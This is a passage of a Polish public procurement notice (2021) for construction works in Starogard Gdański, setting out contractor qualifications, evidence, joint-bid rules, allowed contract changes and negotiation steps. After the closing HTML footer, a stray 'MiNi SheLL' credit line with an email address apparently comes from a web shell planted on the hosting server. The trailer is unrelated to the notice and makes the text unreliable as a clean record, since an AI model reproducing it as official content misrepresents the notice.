PLN według średniego kursu Narodowego Banku Polskiego na dzień, w którym opublikowano ogłoszenie w Biuletynie Zamówień Publicznych. Ten sam kurs Zamawiający przyjmie przy przeliczaniu wszelkich innych danych finansowych podanych w ofercie. <br/> b) skieruje do realizacji zamówienia: <br/> ◦ kierownika budowy, który posiada uprawnienia budowlane w specjalności konstrukcyjno-budowlanej pozwalające na pełnienie samodzielnej funkcji kierownika budowy lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub zagraniczne uprawnienia uznane w zakresie i na zasadach określonych ustawą z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016r., poz. 65).<br/> ◦ projektanta, który posiada uprawnienia budowlane do projektowania w specjalności architektonicznej lub konstrukcyjno-budowlanej, albo odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów lub zagraniczne uprawnienia uznane w zakresie i na zasadach określonych ustawą z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2016r., poz. 65);<br/> W przypadku oferty wspólnej wykonawców warunek można spełnić łącznie.<br/> 3. Z postępowania o udzielenie zamówienia wyklucza się Wykonawców, w stosunku do których zachodzi którakolwiek z okoliczności wskazanych w art. 108 ust. 1 Ustawy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują: 1)<br/>wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i<br/>miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o<br/>których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego<br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w<br/>stanie uzyskać tych dokumentów - inne odpowiednie dokumenty; 2) wykaz osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie<br/>usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich<br/>kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania<br/>zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami; 3) informację banku lub spółdzielczej kasy<br/>oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub<br/>zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim<br/>przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do<br/>reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia<br/>umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp,<br/>zostanie spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia<br/>są wymagane.<br/>3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia (o ile zostały sformułowane) wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty<br/>budowlane, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w ust. 2 i 3, wykonawcy wspólnie ubiegający się o udzielenie<br/>zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty<br/>budowlane wykonają poszczególni wykonawcy. 5. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o<br/>którym mowa w art. 125 ust. 1 Ustawy, składa każdy z wykonawców. Oświadczenia te<br/>potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1<br/>Ustawy, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w<br/>zakresie, w jakim wykonawca powołuje się na jego zasoby. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1 Wszelkie zmiany do niniejszej umowy wymagają formy pisemnej pod rygorem nieważności<br/>takich zmian.<br/>2 Żadna ze stron nie może bez zgody drugiej strony przenieść na osobę trzecią wierzytelności<br/>wynikających z niniejszej umowy.<br/>3 Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści<br/>oferty Wykonawcy w następującym zakresie:<br/>a odstąpienia na wniosek Zamawiającego od realizacji części robót i związanego z tym<br/>obniżenia wynagrodzenia za roboty budowlane,<br/>b zwiększenia na wniosek Zamawiającego zakresu robót i związanego z tym zwiększenia<br/>wynagrodzenia za roboty budowlane,<br/>c zmiany wynagrodzenia brutto w przypadku ustawowej zmiany stawki podatku VAT,<br/>d zmiany terminu realizacji robót budowlanych w przypadku wystąpienia niezawinionych i<br/>niemożliwych do uniknięcie przez Wykonawcę opóźnień wynikających z:<br/>• opóźnienia Zamawiającego w przekazaniu placu budowy,<br/>• opóźnień Zamawiającego w zakresie dokonywania odbiorów lub prób końcowych,<br/>• zawieszenia robót przez Zamawiającego,<br/>• przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada wykonawca,<br/>• zmian w dokumentacji projektowej o czas niezbędny do dostosowania się wykonawcy do takiej<br/>zmiany,<br/>• wykonywania zamówień dodatkowych, których realizacja ma wpływ na termin wykonania<br/>zamówienia podstawowego - o czas ich realizacji,<br/>• niesprzyjających warunków pogodowych (np. niskich temperatur poniżej norm dla<br/>wykonywania tych robót),<br/>• wystąpienia innych warunków geologicznych, geotechnicznych, hydrologicznych niż te<br/>wskazane przez Zamawiającego w dokumentacji projektowej, powodujących konieczność<br/>zmiany sposobu wykonania przedmiotu Umowy,<br/>• wystąpienia na terenie budowy niewybuchów, niewypałów lub znalezisk archeologicznych,<br/>które uniemożliwiają lub utrudniają wykonanie robót na warunkach przewidzianych w Umowie.<br/>e w trakcie realizacji zamówienia wystąpią nieprzewidziane w dokumentacji postępowania o<br/>udzielenie zamówienia publicznego okoliczności powodujące konieczność zmiany opisu<br/>przedmiotu zamówienia, w tym w szczególności, jeżeli informacje wynikające z opisu przedmiotu<br/>zamówienia okażą się nieprawidłowe, co spowoduje konieczność zmiany opisu przedmiotu<br/>zamówienia w zakresie cech, funkcjonalności lub innych wymagań Zamawiającego<br/>odnoszących się do projektowanego obiektu, a także zmian rozwiązań technicznych, technologicznych lub materiałowych.<br/>f w trakcie realizacji zamówienia konieczna okaże się zmiana opisu przedmiotu zamówienia,<br/>której wprowadzenie jest wynikiem: rozwoju technicznego, technologicznego lub w zakresie<br/>materiałów budowlanych, a wprowadzenie zmiany spowoduje, że zaprojektowane rozwiązanie<br/>będzie przewidywać najbardziej aktualne lub odpowiednie rozwiązania techniczne,<br/>technologiczne lub w zakresie stosowanych materiałów budowlanych, zmian wymagań<br/>Zamawiającego co do przedmiotu zamówienia, które nie były przewidziane w pierwotnym opisie<br/>przedmiotu zamówienia, a ich wprowadzenie jest zasadne ze względów funkcjonalnych<br/>projektowanego obiektu, zmian obowiązujących przepisów prawa, które weszły w życie po<br/>terminie składania ofert, powodujących konieczność zmiany zakresu przedmiotu zamówienia, w<br/>tym w szczególności zmiany obowiązków Wykonawcy lub rozwiązań wynikających z opisu<br/>przedmiotu zamówienia, zaprzestania korzystania z rozwiązań, materiałów lub technologii<br/>przewidzianej w opisie przedmiotu zamówienia lub Umowie i zastąpienie dotychczasowych postanowień<br/>w tym zakresie aktualnie stosowanymi rozwiązaniami, materiałami lub technologiami.<br/>g technologii wykonania robót bez zmiany wynagrodzenia Wykonawcy, na wniosek Wykonawcy<br/>lub Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl/starogard_gdanski</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-25 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-24</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 2. Postępowanie prowadzone jest w trybie podstawowym z możliwością przeprowadzenia<br/>negocjacji treści ofert w celu ich ulepszenia, o którym mowa w art. 275 pkt 2 Ustawy.<br/>3. Do negocjacji zostaną zaproszeni wykonawcy, których oferty nie podlegają odrzuceniu.<br/>4. Zamawiający ograniczy liczbę wykonawców, których zaprosi do negocjacji ofert do 3 z<br/>zastrzeżeniem ust. 5. W przypadku mniejszej liczby ofert Zamawiający zaprosi do negocjacji<br/>wszystkich wykonawców.<br/>5. W celu ograniczenia liczby wykonawców zamawiający przyjmie kryterium najniższej ceny.<br/>Zaproszenie zostanie skierowane do wykonawców, którzy w rankingu opracowanym na<br/>podstawie powyższego kryterium zajmą miejsca od 1 do 3. Jeśli na pozycji 3 zostanie<br/>sklasyfikowanych dwóch lub więcej wykonawców, zamawiający również tych wykonawców<br/>zaprosi do negocjacji.<br/>6. W przypadku skorzystania przez Zamawiającego z możliwości negocjowania treści ofert,<br/>negocjacje dotyczyć będą wyłącznie tych elementów treści ofert, które podlegają ocenie w<br/>ramach kryteriów oceny ofert. Negocjacje mogą dotyczyć wszystkich kryteriów oceny ofert.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-06-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com